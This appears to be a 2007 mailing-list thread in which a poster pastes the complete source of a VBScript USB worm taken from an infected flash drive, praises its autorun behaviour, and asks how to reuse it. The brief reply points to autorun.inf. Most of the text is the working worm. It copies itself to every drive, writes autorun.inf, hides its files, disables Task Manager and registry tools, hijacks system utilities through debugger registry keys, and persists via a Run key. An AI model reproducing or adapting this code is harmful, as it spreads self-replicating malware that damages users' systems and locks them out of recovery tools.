Ah, this VBS virus again :D. It looks like the part that makes it autorun
isn't in here;
it's usually in another file, named autorun.inf. Just take a look, there's
bound to be a command in it
that runs this VBS file.


On 3/7/07, darkness night <[EMAIL PROTECTED]> wrote:
>
>   Yesterday I got a VBS file from the flash disk of a friend whose PC is
> infected with something. That PC copies VBS files everywhere, with nearly
> identical contents. One of the variants:
> =================================================
> 'My name is Slow but sure V1.08
> on error resume next
> dim rekursif,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
> atr = "[autorun]" & vbcrlf & "shellexecute=wscript.exe r4n694-24y.dll.vbs"
> set fs = createobject("Scripting.FileSystemObject")
> set mf = fs.getfile(Wscript.ScriptFullname)
> dim text,size
> size = mf.size
> check = mf.drive.drivetype
> set text = mf.openastextstream(1,-2)
> do while not text.atendofstream
> rekursif = rekursif & text.readline
> rekursif = rekursif & vbcrlf
> loop
> do
> Set winpath = fs.getspecialfolder(0)
> set tf = fs.getfile(winpath & "\r4n694-24y.dll.vbs")
> tf.attributes = 32
> set tf=fs.createtextfile(winpath & "\r4n694-24y.dll.vbs",2,true)
> tf.write rekursif
> tf.close
> set tf = fs.getfile(winpath & "\r4n694-24y.dll.vbs")
> tf.attributes = 39
> for each flashdrive in fs.drives
> If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and
> flashdrive.path <> "A:" then
> set tf=fs.getfile(flashdrive.path &"\r4n694-24y.dll.vbs")
> tf.attributes =32
> set tf=fs.createtextfile(flashdrive.path &"\r4n694-24y.dll.vbs",2,true)
> tf.write rekursif
> tf.close
> set tf=fs.getfile(flashdrive.path &"\r4n694-24y.dll.vbs")
> tf.attributes = 39
> set tf =fs.getfile(flashdrive.path &"\autorun.inf")
> tf.attributes = 32
> set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
> tf.write atr
> tf.close
> set tf = fs.getfile(flashdrive.path &"\autorun.inf")
> tf.attributes=39
> end if
> next
> set rg = createobject("WScript.Shell")
> rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet
> Explorer\Main\Window Title","Hacked by Zay"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",
> "0", "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind",
> "1", "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions",
> "1", "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",
> "1", "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",
> "1", "REG_DWORD"
> rg.RegWrite
> "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",
> "1", "REG_DWORD"
> rg.regwrite
> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\r4n694-24y",
> winpath & "\r4n694-24y.dll.vbs"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution
> Options\RegistryEditor.exe\Debugger","notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","
> notepad.exe"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\RegisteredOrganization", "Don't Panic, System anda sudah
> kami ambil alih !"
> rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
> NT\CurrentVersion\RegisteredOwner","r4n694-24y"
> if check <> 1 then
> Wscript.sleep 200000
> end if
> loop while check <> 1
> set sd = createobject("Wscript.shell")
> sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
> ==========================================================================
> There was another variant I got; unfortunately, out of habit, I
> shift+deleted it right away...
> But I did try running it too, and basically it makes the flash disk
> able to autorun!!!!!!!
> It's pretty cool, so you can get creative.....hehehehehe....
> Anyway, that other variant is the one that makes IE show the text Hacked by
> Godzilla
> or whoever, anyway it had some zilla-something in it.....
>
> So, that's cool, right, so I'd like to ask: which part of the script
> makes the flash disk autorun? So that from My Computer, when we right-click
> the flash disk drive, there is an autorun option, cool......
>
> Thanks
>
>

